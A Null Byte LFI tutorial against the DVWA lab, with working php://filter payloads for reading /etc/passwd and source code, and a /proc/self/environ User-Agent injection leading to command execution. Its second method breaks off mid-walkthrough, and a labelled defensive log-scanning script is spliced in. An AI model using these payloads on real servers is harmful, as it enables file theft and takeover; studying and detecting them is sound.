Overcoming LFI Limitations with Advanced Techniques « Null Byte :: WonderHowTo



One of the most common security vulnerabilities in web applications is LFI, which allows unauthorized access to sensitive files on the server. Because the weakness is so common, it is often defended against, and the low-hanging fruit is easy to close off. However, there are always creative ways around these defenses, and we'll explore two methods to beat the restrictions and successfully complete an LFI.

Local File Inclusion (LFI) is a technique that allows an attacker to access files on the system that otherwise could not be displayed. This is usually done through a vulnerable Web application that accesses files outside the Web document root using a variety of methods.

With the exception of the worst-written web applications, LFI is generally not as straightforward as simply requesting the desired file. However, there are techniques to circumvent these limitations, for example the PHP filter wrapper method and the /proc/self/environ method. To test them, we use DVWA (Damn Vulnerable Web Application) as the target and Kali Linux as the attacking machine.

Method 1: PHP Filter Wrapper

First, log in to DVWA with the default credentials, admin and password.

Next, go to the DVWA Security page. Set the security level to Low in the drop-down list and click Submit.

Finally, switch to the "Include Files" page, which is vulnerable to LFI.

The most basic type of LFI is the dot-dot-slash technique, where the vulnerable parameter is given a series of periods and slashes (to traverse up the directory tree) in order to reach the desired target file. Below is a typical LFI that accesses the file /etc/passwd.

In most cases, we are not lucky, and there are security measures to prevent this type of attack. However, we can often work around these limitations by cleverly using PHP's filter wrapper.

PHP has a number of wrappers that provide access to input and output streams and manipulate read or written data. One of these wrappers is the filter wrapper, which allows PHP's filter functions to access a stream after opening.

One of the filter wrapper parameter options is the ability to encode a resource in Base64. We can use this to our advantage to display files that are blocked in more restricted environments. For example, to display the /etc/passwd file, place this in the page parameter:

  php://filter/convert.base64-encode/resource=/etc/passwd

When we load the page, we see a long string of Base64 encoded data.

Now we just have to decode it to display the content. We can either use an online Base64 decoder or simply echo the string in the terminal and pipe it to base64 with the -d flag for decoding:

  ~# echo <base64-encoded output from the page> | base64 -d

And now we can see the contents of /etc/passwd:

  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  dhcp:x:101:102::/nonexistent:/bin/false
  syslog:x:102:103::/home/syslog:/bin/false
  klog:x:103:104::/home/klog:/bin/false
  sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
  msfadmin:x:1000:1000:msfdmin,,,:/home/msfadmin:/bin/bash
  bind:x:105:113::/var/cache/bind:/bin/false
  postfix:x:106:115::/var/spool/postfix:/bin/false
  ftp:x:107:65534::/home/ftp:/bin/false
  postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
  tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
  distccd:x:111:65534::/:/bin/false
  user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
  service:x:1002:1002:,,,:/home/service:/bin/bash
  telnetd:x:112:120::/nonexistent:/bin/false
  proftpd:x:113:65534::/var/run/proftpd:/bin/false
  statd:x:114:65534::/var/lib/nfs:/bin/false

The filter wrapper also includes a ROT13 filter (string.rot13) that rotates each letter thirteen places. We can use this as well to work around certain restrictions and display files. Here is the string to use:

  php://filter/read=string.rot13/resource=/etc/passwd

When the page loads, we see what looks like gibberish at the top of the page.

Copy this data and enter it into a ROT13 decoder to retrieve the contents of our file.

The filter wrapper can sometimes be used as a bypass simply by specifying the desired resource, without any encoding at all. Like this:

  php://filter/resource=/etc/passwd

This may still give us the contents of /etc/passwd.

This wrapper is useful not only for viewing system files, but also for reading the source code of PHP files. For example, we can show the source code of include.php with the following line:

  php://filter/convert.base64-encode/resource=include.php

Again, we get a Base64-encoded string.

And we can decode it using the same procedure as before.

  ~# echo <base64-encoded output from the page> | base64 -d

Now we can display the source code of the page in plain text:

  <?php

  $page[ 'body' ] .= "
  <div class=\"body_padded\">
      <h1>Vulnerability: File Inclusion</h1>

      <div class=\"vulnerable_code_area\">

          To include a file edit the ?page=index.php in the URL to determine which file is included.

      </div>

      <h2>More info</h2>
      <ul>
          <li>".dvwaExternalLinkUrlGet( 'http://en.wikipedia.org/wiki/Remote_File_Inclusion' )."</li>
          <li>".dvwaExternalLinkUrlGet( 'http://www.owasp.org/index.php/Top_10_2007-A3' )."</li>
      </ul>
  </div>
  ";

  ?>

This method is especially useful when there is a feature on the page that could potentially be abused for shell access or privilege escalation, since reading the source lets us review exactly what that feature does.

Method 2: /proc/self/environ Command Execution

Another LFI technique, for environments with more restricted permissions, uses the file /proc/self/environ on Linux systems. This file contains the environment variables of the current process. If we can read it as a non-root user (such as www-data, which is common for web servers), we can use it to get a shell. It is accessed by passing it as the page parameter:

  /proc/self/environ

Some information about the environment is displayed on the page.

While this may be useful for reconnaissance, what we are really after is command execution. This is done by placing PHP code in the User-Agent header: the web server stores the request's User-Agent in the process environment, so it ends up inside /proc/self/environ and is executed when the page includes that file.

The easiest way to do this is to use a proxy such as Burp Suite. Start Burp, make sure Intercept is turned on, and load the page with page=/proc/self/environ as before. Burp should show a request like this:

There are two things we need to change here. First, enter the PHP code in the User-Agent field:

       

This calls system() on the server and executes whatever command we pass in the cmd parameter. Next, add the desired command to the page parameter like so:

  page=/proc/self/environ&cmd=id

The final request should look like this:
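From the defender's side, every request this article walks through (dot-dot-slash traversal, the php://filter wrapper in its Base64, ROT13 and bare resource= forms, and /proc/self/environ paired with a cmd parameter) stands out in a web server access log. The following Python is an added example, not code from the original article or from DVWA; the log lines are constructed samples and the format is assumed to be Apache's Common Log Format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic); they mirror the
# article's requests: a normal include, dot-dot-slash traversal, the
# php://filter wrapper (plain and URL-encoded) and /proc/self/environ with cmd.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1200
10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../etc/passwd HTTP/1.1" 200 2100
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2800
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /dvwa/vulnerabilities/fi/?page=php%3A%2F%2Ffilter%2Fread%3Dstring.rot13%2Fresource%3Dinclude.php HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /dvwa/vulnerabilities/fi/?page=/proc/self/environ&cmd=id HTTP/1.1" 200 700
"""

# Common Log Format (assumed): client identd user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3}')

def classify_value(value):
    """Return the LFI indicators found in one query-parameter value."""
    v = unquote(unquote(value)).lower()  # also undo double URL-encoding before matching
    hits = []
    if '../' in v or '..\\' in v:
        hits.append('dot_dot_slash')
    if v.startswith('php://filter'):       # base64, rot13 or bare resource= form
        hits.append('php_filter_wrapper')
    if '/proc/self/environ' in v:
        hits.append('proc_self_environ')
    return hits

def classify_request(path):
    """Map each suspicious parameter to its indicators; flag cmd when it accompanies /proc/self/environ."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    findings = {}
    for name, values in params.items():
        for value in values:
            hits = classify_value(value)
            if hits:
                findings.setdefault(name, []).extend(hits)
    if 'cmd' in params and any('proc_self_environ' in h for h in findings.values()):
        findings.setdefault('cmd', []).append('cmd_param')
    return findings

def scan_log(text):
    """Parse each log line and return one alert per request that has findings."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := classify_request(m.group('path'))):
            alerts.append({'ip': m.group('ip'), 'path': m.group('path'), 'findings': findings})
    return alerts
```

Running scan_log(SAMPLE_LOG) flags the four attack lines and leaves the plain include.php request alone; the same classifier can be dropped into a log pipeline or a WAF rule test.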

Summary

Today we covered local file inclusion, how it is used to access system files, and advanced techniques for locked-down environments. First, we looked at PHP's filter wrapper and discussed how it can be used to encode and read files and source code. Then we examined the /proc/self/environ LFI and how it can be used to get a shell on the target. This all goes to show that even a (seemingly) simple vulnerability such as LFI can sometimes lead to a complete system takeover.

Cover image by Myrfa/Pixabay; screenshots by drd_/Null Byte
